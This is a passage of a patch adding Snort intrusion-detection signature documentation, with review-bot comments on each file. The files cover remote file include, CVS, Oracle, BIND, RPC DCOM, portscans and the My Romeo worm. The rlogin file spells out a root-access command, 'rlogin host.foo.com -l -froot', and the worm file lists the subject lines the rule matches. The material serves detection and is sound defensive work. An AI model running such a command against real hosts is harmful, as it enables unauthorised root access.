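Review bot: The Impact sentence is garbled: "may allow files to be existing files to be overwritten or new files created" should read "may allow existing files to be overwritten or new files to be created on the rsync server". Attack Scenarios writes the option as "-backup-dir" with one dash while Detailed Information correctly uses "--backup-dir"; keep the double-dash form in both places since that is what appears on the wire. The chroot advice in Corrective Action is the right mitigation and is worth keeping first.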
--- /dev/null
+++ b/doc/signatures/100000424.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000424
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "feedback.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "feedback.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
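Review bot: The third Detailed Information paragraph (validating "the credentials of a client host") is generic CGI boilerplate that does not describe a remote file include via "file_path"; drop it or replace it with what the rule actually matches (a URL passed as that parameter). Additional References is empty; add the advisory the rule was written from. Ease of Attack says "Exploits exist." while False Positives says "None known."; if legitimate requests can carry a URL in file_path, that belongs under False Positives. Minor: "running ona web server", "attackers choosing".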
--- /dev/null
+++ b/doc/signatures/100000611.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000611
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
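Review bot: Same template problems as the other remote file include files in this patch: the credential-validation paragraph in Detailed Information does not describe an include via "admin_template_path", Additional References is empty, and "ona" and "attackers choosing" need fixing. This file also drops the blank line before "--" after the Sid, Affected Systems and Contributors sections, unlike every other file here; keep the separator layout uniform, since anything that splits these files on "--" blocks will otherwise see different shapes.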
--- /dev/null
+++ b/doc/signatures/2318.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2318
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Concurrent Versions System (CVS).
+
+--
+Impact:
+Serious. Manipulation of the host file system is possible.
+
+--
+Detailed Information:
+Concurrent Versions System (CVS) is used to track the history of source
+code files when developing software.
+
+Some versions of CVS contain a vulnerability that may allow an attacker
+to create directories or files in the host filesystem external to the
+cvsroot. This is achieved via a malformed module request.
+
+--
+Affected Systems:
+	CVS versions prior to 1.11.10
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted request to a cvs server and
+create files and directories of their choosing in the hosts root
+filesystem. The attacker may then access these files at will to further
+compromise the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If compression is being used in data communications between the CVS
+server and clients, this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
+
+--
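Review bot: Attack Scenarios says files are created "in the hosts root filesystem", but Detailed Information says "external to the cvsroot"; the second is the accurate statement (anywhere the cvs server process can write), so align the wording and fix "hosts" to "host's". The False Negatives note about compressed client/server traffic is exactly the caveat an analyst needs and should stay.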
--- /dev/null
+++ b/doc/signatures/604.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 604
+
+--
+Summary:
+This event is generated due to the use of a suspicious login attempt
+
+-- 
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rsh" whilst passing the parameter "-froot".
+
+A bug in some implementations of the "rsh" daemon software allowed remote root access using the "-froot" parameter for the "rsh command"
+
+--
+Attack Scenarios: 
+If a UNIX machine has the "rsh" service running and is vulnerable to this bug, in can be exploited simply by running the "rsh" command with "-froot" flag. For example, rlogin host.foo.com -l -froot
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Disable the "rsh" service if not used, apply a patch if appropriate.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113
+
+Arachnids:
+http://www.whitehats.com/info/IDS387
+
+--
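Review bot: The service is named inconsistently: Summary, Detailed Information and Ease of Attack talk about the "rsh" daemon and command, but the worked example is "rlogin host.foo.com -l -froot" and Corrective Action says to replace rlogin with ssh; the referenced CVE-1999-0113 is the rlogin "-froot" bug, where the bogus user name is passed through to login's -f (pre-authenticated) option, so name rlogin/rlogind consistently and say in Detailed Information why "-froot" works. Typo in Attack Scenarios: "in can be exploited" should be "it can be exploited". The file also lacks an Affected Systems section.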
--- /dev/null
+++ b/doc/signatures/2814.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2814
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_object_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
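Review bot: The procedure name is split from its sentence ("add_object_to_flavor" on one line, ". This procedure is included in" on the next), so the text reads as a stray full stop and a search for the sentence will miss it; join it as "the procedure add_object_to_flavor. This procedure is included in sys.dbms_repcat_fla." Affected Systems reads "Oracle Oracle9i". Additional References is empty although Summary calls this a "known vulnerability"; add the Oracle alert and CVE entry.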
--- /dev/null
+++ b/doc/signatures/1581.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1581
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
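Review bot: Every section here is generic boilerplate: the file never says which URI, script or product sid 1581 matches, so an analyst reading the alert learns nothing beyond "web server attack". State the matched content in Summary and Detailed Information, name the affected product and version under Affected Systems, and fill Additional References; as written, "Simple. Exploits exist." and "None known." for false positives cannot be checked.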
--- /dev/null
+++ b/doc/signatures/259.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+259
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with incorrect validation of DNS NXT records.
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker to execute arbitrary commands with the privileges of the user running BIND.
+
+--
+Detailed Information:
+Improper validation of DNS NXT records may allow at attacker to perform a buffer overflow.  This can allow the attacker to execute arbitrary code with the privileges of the user running BIND.
+
+--
+Affected Systems:
+BIND versions 8.2 up to, but not including, 8.2.2.
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines content based on the exploit code written by ADM.  If the content is changed, the rule may not fire.
+
+--
+Corrective Action:
+Upgrade to a version of BIND 8.2.2 or greater, or patch vulnerable versions of BIND.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1999-14.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833
+
+Bugtraq:
+http://www.securityfocus.com/bid/788
+
+
+--
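Review bot: Typo in Detailed Information: "may allow at attacker" should be "an attacker". Corrective Action "Upgrade to a version of BIND 8.2.2 or greater" is awkward; "Upgrade to BIND 8.2.2 or later" matches the Affected Systems range ("8.2 up to, but not including, 8.2.2"). The False Negatives note that the rule keys on the ADM exploit's content is the caveat an analyst needs and should stay.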
--- /dev/null
+++ b/doc/signatures/100000567.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000567
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Qdig" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "pre_gallery" parameter in the "index.php" 
+script used by the "Qdig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Qdig
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
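Review bot: Impact and the second Detailed Information paragraph are copied from the remote file include template ("system integrity compromise", "execute system binaries"), which does not describe a cross site scripting bug; Attack Scenarios gets it right (a malicious link that steals information from the user who clicks it), so Impact should say script execution in the victim's browser with session or credential theft, and the "execute system binaries" sentence should go. The blank line before "--" is missing after the Sid, Affected Systems and Contributors sections, unlike the other files.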
--- /dev/null
+++ b/doc/signatures/2582.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2582
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal associated with the Crystal Reports web viewer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be viewed or
+possibly deleted.
+
+--
+Detailed Information:
+A vulnerability exists in the Crystal Reports web viewer that may permit
+an attacker to view or delete unauthorized files.  The is due to a
+failure to ensure that that a requested Crystal Report file location
+is in the web root directory, permitting unauthorized files to be
+viewed.
+
+In addition, Crystal Reports assumes that the requested report
+file for viewing is a temporary file and deletes it after the
+web version has been viewed.  This problem combined with the
+directory traversal vulnerability may allow sensitive or valuable
+files to be deleted.
+
+--
+Affected Systems:
+Crystal Reports 8.5 JAVA SDK
+Crystal Reports RAS 8.5 for UNIX
+Crystal Reports 9.0
+Crystal Enterprise 9.0
+Crystal Reports 10
+Crystal Reports 10.0
+
+--
+Attack Scenarios:
+An attacker can request to view a file not in the web root
+directory, permitting unauthorized information disclosure.
+The viewed file will be deleted subsequently possibly causing
+harm to the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0204
+
+Other:
+http://www.microsoft.com/security/bulletins/200406_crystal.mspx
+
+--
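Review bot: Typos in Detailed Information: "The is due to a failure to ensure that that a requested..." should read "This is due to a failure to ensure that a requested...". Affected Systems lists both "Crystal Reports 10" and "Crystal Reports 10.0"; keep one. Corrective Action only says to upgrade, while Additional References links a Microsoft bulletin; say which vendor patch applies so the reader does not have to work that out from the link.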
--- /dev/null
+++ b/doc/signatures/887.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+887
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+WWW-SQL:
+http://grox.net/doc/web/www-sql.html
+
+--
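Review bot: The only product-specific information in this file is the WWW-SQL link under Additional References; Summary and Detailed Information never name www-sql or the URI the rule matches, and the text is the same generic CGI boilerplate used for sid 1581 in this patch. Name the script and the weakness in Detailed Information and fill Affected Systems with the www-sql versions concerned. Minor: "running ona web server", "attackers choosing".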
--- /dev/null
+++ b/doc/signatures/122-15.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-15
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered protocol sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
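Review bot: Detailed Information describes portscans in general but never says what an "ip filtered protocol sweep" is, which is the one thing specific to sid 122-15; add a sentence explaining that "sweep" means one source probing many hosts, "protocol" means IP protocol numbers rather than TCP/UDP ports, and "filtered" means the probes drew few or no responses, as README.sfportscan describes, then keep the general text. Typos: "reconnaisance", "consititute"; Corrective Action "Apply any appropriate vendor supplied patches as appropriate" repeats itself. The two leading blank lines at the top of the file should go.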
--- /dev/null
+++ b/doc/signatures/3262.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3262
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
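Review bot: the Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which describes a malformed RPC request to the DCOM interface rather than a file request over a share; the scenario should describe the malformed RPC request so the two sections agree. In Ease of Attack, "Expoit code exists." should read "Exploit code exists." Additional References is empty even though Corrective Action tells the reader to apply vendor patches; a reference to the vendor bulletin would let operators confirm they are patched.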
--- /dev/null
+++ b/doc/signatures/2708.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2708
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_change
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
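Review bot: the procedure name in Detailed Information is split so that the sentence's full stop begins a new line ("vulnerability in the procedure begin_flavor_change" / ". This procedure is included in" / "dbms_offline_og."); join this into one sentence, "vulnerability in the procedure begin_flavor_change. This procedure is included in dbms_offline_og." Affected Systems reads "Oracle Oracle9i" (duplicated word), Corrective Action lacks its terminating full stop, "None Known" should be "None known." to match the other files, and several "-- " separator lines carry trailing whitespace.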
--- /dev/null
+++ b/doc/signatures/100000402.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000402
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "event.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "event.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
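Review bot: "running ona web server" in the third Detailed Information paragraph should be "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". The Summary's "may indicate that an exploitation attempt has been attempted" is circular; "may indicate an exploitation attempt" suffices. The third Detailed Information paragraph is generic credential-validation text that does not describe a remote file include and could be dropped, since the first two paragraphs already cover the mechanism. The file also opens with two blank lines and closes with one, unlike the other files in this patch.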
--- /dev/null
+++ b/doc/signatures/725.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+725
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
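Review bot: spelling in Summary and Detailed Information: "specifcally" should be "specifically", "propogation" should be "propagation", "propogates" should be "propagates" (the second paragraph already spells "propagate" correctly), and "WIndows" should be "Windows"; "also Known As" should be lowercase "also known as". There is a stray extra blank line after the Sid value that the other files do not have. The False Positives entry is a useful one, since it tells the analyst that the rule keys on the subject lines listed under Attack Scenarios; consider stating explicitly in Detailed Information that the subject list is what the rule matches, so a hit on a plain "hello world" or "my picture" mail is understood as expected behaviour rather than a bug.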
--- /dev/null
+++ b/doc/signatures/100000374.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000374
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_words.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_words.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
